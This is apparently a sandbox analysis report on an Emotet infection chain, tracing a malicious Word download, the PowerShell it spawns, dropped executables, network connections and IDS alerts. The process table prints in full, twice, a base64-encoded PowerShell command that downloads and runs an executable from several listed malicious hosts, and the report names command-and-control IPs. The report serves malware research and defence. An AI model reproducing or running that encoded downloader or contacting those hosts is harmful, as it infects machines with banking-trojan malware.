URL: | http://kndesign.com.br/VKeN-rW_cDzV-iFv |
Full analysis: | https://app.any.run/tasks/084d8779-3a16-43fa-868a-f83dd0246311 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | February 11, 2019, 07:04:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | F382B9A6175A5DD2BBF332A9C8566433 |
SHA1: | 49ADD389924B4C3DB2B7CED7C5F67CCDBBD76DDB |
SHA256: | C1C9D3BE7C0B02806DF25E9FBA1BA50BE85A7AAFF7588175F6A1A425372C8501 |
SSDEEP: | 3:N1KVLBAsZtJAw:CXAot3 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2932 | "C:\Program Files\Internet Explorer\iexplore.exe" http://kndesign.com.br/VKeN-rW_cDzV-iFv | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3484 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2932 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2592 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\062245844751328488.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3984 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2952 | Powershell -e JAB6AEUAdwBRAG4AQwBJAFIAPQAoACcAUAAnACsAJwBYADgANQAnACsAJwBVAFEAJwApADsAJAByAGoANwBkAFIAegBDAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEASABPADgAbgBqAD0AKAAnAGgAdAB0AHAAOgAvACcAKwAnAC8AbABpAHYAaQBuAGcAcwBvAGwAJwArACcAaQB0ACcAKwAnAHUAJwArACcAZABlAC4AYwBvAG0ALwAnACsAJwBIAFEAZgAnACsAJwBoAE4AUAA1AEkAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKwAnAGoAYQAnACsAJwBzACcAKwAnAHAAaQBuAGYAbwAnACsAJwByAG0AJwArACcAYQB0AGkAYwBhAC4AYwBvAG0ALwAnACsAJwBnAFYAUABzACcAKwAnAFYAMABQACcAKwAnAFMAUgBTAEAAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBpAGQAaQBnAGkAdABvACcAKwAnAC4AbgBlAHQALwAyACcAKwAnAEYAbwA3ADIAJwArACcAVABpACcAKwAnAFoASgBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AYgAnACsAJwBlAHoAJwArACcAbwBlAGsAYgBvAHMAJwArACcAbgBpACcAKwAnAGUALgBuAGwALwBMAFYAeQBRAGUAWAB0AFcAdQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdwB3AHcALgBlAGwAcgBhAGMAbwBzAGUAYwByAGUAdAAuAGMAbwBtAC8AcgAnACsAJwBiADMAeABSAGQAYwAnACsAJwBoACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEgAZgBUAHMAMgBBAD0AKAAnAGoAJwArACcATAA0ADQARQAnACsAJwBrAFQARgAnACkAOwAkAFgAegBDAFYAQwBiADcAIAA9ACAAKAAnADUAJwArACcAOAA0ACcAKQA7ACQAagA4AEYAMwBqAFoAOABUAD0AKAAnAHUAcgAnACsAJwBFADcAUQB6AFgAJwApADsAJABhADcAawBIAEEAdwBmAEYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFgAegBDAFYAQwBiADcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8ANgBmAGgATQA5ACAAaQBuACAAJABhAEgATwA4AG4AagApAHsAdAByAHkAewAkAHIAagA3AGQAUgB6AEMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATABPADYAZgBoAE0AOQAsACAAJABhADcAawBIAEEAdwBmAEYAKQA7ACQASwB3AFIANQBaADcAPQAoACcAQwBzAEUAMgAnACsAJwBVACcAKwAnAGMAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGADsAJABMAEQAbgB3AFQANQBxAD0AKAAnAG0AJwArACcAaQB3ADgAegB6ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAMwBZAEQAcAA2AD0AKAAnAHYAJwArACcAbABJACcAKwAnAG4AaQBPACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3100 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\062245844751328488.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
284 | Powershell -e JAB6AEUAdwBRAG4AQwBJAFIAPQAoACcAUAAnACsAJwBYADgANQAnACsAJwBVAFEAJwApADsAJAByAGoANwBkAFIAegBDAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEASABPADgAbgBqAD0AKAAnAGgAdAB0AHAAOgAvACcAKwAnAC8AbABpAHYAaQBuAGcAcwBvAGwAJwArACcAaQB0ACcAKwAnAHUAJwArACcAZABlAC4AYwBvAG0ALwAnACsAJwBIAFEAZgAnACsAJwBoAE4AUAA1AEkAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKwAnAGoAYQAnACsAJwBzACcAKwAnAHAAaQBuAGYAbwAnACsAJwByAG0AJwArACcAYQB0AGkAYwBhAC4AYwBvAG0ALwAnACsAJwBnAFYAUABzACcAKwAnAFYAMABQACcAKwAnAFMAUgBTAEAAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBpAGQAaQBnAGkAdABvACcAKwAnAC4AbgBlAHQALwAyACcAKwAnAEYAbwA3ADIAJwArACcAVABpACcAKwAnAFoASgBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AYgAnACsAJwBlAHoAJwArACcAbwBlAGsAYgBvAHMAJwArACcAbgBpACcAKwAnAGUALgBuAGwALwBMAFYAeQBRAGUAWAB0AFcAdQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdwB3AHcALgBlAGwAcgBhAGMAbwBzAGUAYwByAGUAdAAuAGMAbwBtAC8AcgAnACsAJwBiADMAeABSAGQAYwAnACsAJwBoACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEgAZgBUAHMAMgBBAD0AKAAnAGoAJwArACcATAA0ADQARQAnACsAJwBrAFQARgAnACkAOwAkAFgAegBDAFYAQwBiADcAIAA9ACAAKAAnADUAJwArACcAOAA0ACcAKQA7ACQAagA4AEYAMwBqAFoAOABUAD0AKAAnAHUAcgAnACsAJwBFADcAUQB6AFgAJwApADsAJABhADcAawBIAEEAdwBmAEYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFgAegBDAFYAQwBiADcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8ANgBmAGgATQA5ACAAaQBuACAAJABhAEgATwA4AG4AagApAHsAdAByAHkAewAkAHIAagA3AGQAUgB6AEMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATABPADYAZgBoAE0AOQAsACAAJABhADcAawBIAEEAdwBmAEYAKQA7ACQASwB3AFIANQBaADcAPQAoACcAQwBzAEUAMgAnACsAJwBVACcAKwAnAGMAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGADsAJABMAEQAbgB3AFQANQBxAD0AKAAnAG0AJwArACcAaQB3ADgAegB6ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAMwBZAEQAcAA2AD0AKAAnAHYAJwArACcAbABJACcAKwAnAG4AaQBPACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2416 | "C:\Users\admin\584.exe" | C:\Users\admin\584.exe | — | Powershell.exe |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Description: Lithuania Exit code: 0 Version: 6.1 | ||||
3440 | "C:\Users\admin\584.exe" | C:\Users\admin\584.exe | 584.exe | |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Description: Lithuania Exit code: 0 Version: 6.1 | ||||
708 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 584.exe | |
User: admin Company: Microsoft Corpor Integrity Level: MEDIUM Description: Lithuania Exit code: 0 Version: 6.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2932 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2932 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2932 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFFFB605BFC692C4A8.TMP | — | |
MD5:— | SHA256:— | |||
2592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR187B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_F9896085-C140-4376-934E-5D0466E2D65D.0\994A698.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_F9896085-C140-4376-934E-5D0466E2D65D.0\8106FD39.tmp | — | |
MD5:— | SHA256:— | |||
2932 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFB004D05AC158CC2B.TMP | — | |
MD5:— | SHA256:— | |||
2932 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{5C1448BB-2DCB-11E9-BAD8-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
2592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FBC505B9.tmp | — | |
MD5:— | SHA256:— | |||
3984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_F9896085-C140-4376-934E-5D0466E2D65D.0\~WRS{95C90298-78DD-4010-BFF4-5DC30CD06284}.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2952 | Powershell.exe | GET | — | 178.62.120.82:80 | http://livingsolitude.com/HQfhNP5I | GB | — | — | suspicious |
3252 | wabmetagen.exe | GET | — | 174.84.250.37:443 | http://174.84.250.37:443/ | US | — | — | malicious |
3484 | iexplore.exe | GET | 200 | 200.98.245.97:80 | http://kndesign.com.br/VKeN-rW_cDzV-iFv/ | BR | xml | 284 Kb | malicious |
2952 | Powershell.exe | GET | 200 | 86.109.170.198:80 | http://jaspinformatica.com/gVPsV0PSRS/ | ES | executable | 461 Kb | malicious |
3484 | iexplore.exe | GET | 301 | 200.98.245.97:80 | http://kndesign.com.br/VKeN-rW_cDzV-iFv | BR | html | 248 b | malicious |
3252 | wabmetagen.exe | GET | 200 | 71.174.233.71:20 | http://71.174.233.71:20/ | US | binary | 132 b | malicious |
2932 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3484 | iexplore.exe | GET | 200 | 200.98.245.97:80 | http://kndesign.com.br/VKeN-rW_cDzV-iFv/ | BR | xml | 284 Kb | malicious |
2952 | Powershell.exe | GET | 301 | 86.109.170.198:80 | http://jaspinformatica.com/gVPsV0PSRS | ES | html | 246 b | malicious |
2932 | iexplore.exe | GET | 404 | 200.98.245.97:80 | http://kndesign.com.br/favicon.ico | BR | html | 328 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2932 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3252 | wabmetagen.exe | 187.131.137.216:50000 | — | Uninet S.A. de C.V. | MX | malicious |
3252 | wabmetagen.exe | 200.110.85.138:990 | — | Telconet S.A | EC | malicious |
2932 | iexplore.exe | 200.98.245.97:80 | kndesign.com.br | Universo Online S.A. | BR | malicious |
2952 | Powershell.exe | 86.109.170.198:80 | jaspinformatica.com | Abansys & Hostytec, S.L. | ES | malicious |
3484 | iexplore.exe | 200.98.245.97:80 | kndesign.com.br | Universo Online S.A. | BR | malicious |
3252 | wabmetagen.exe | 174.84.250.37:443 | — | — | US | malicious |
3252 | wabmetagen.exe | 71.174.233.71:20 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
2952 | Powershell.exe | 178.62.120.82:80 | livingsolitude.com | Digital Ocean, Inc. | GB | suspicious |
3252 | wabmetagen.exe | 64.32.70.194:20 | — | Compañía Dominicana de Teléfonos, C. por A. - CODETEL | DO | malicious |
Domain | IP | Reputation |
---|---|---|
kndesign.com.br |
| malicious |
www.bing.com |
| whitelisted |
livingsolitude.com |
| suspicious |
jaspinformatica.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3484 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
3484 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possible malicious Office doc hidden in XML file |
2952 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2952 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2952 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3252 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3252 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |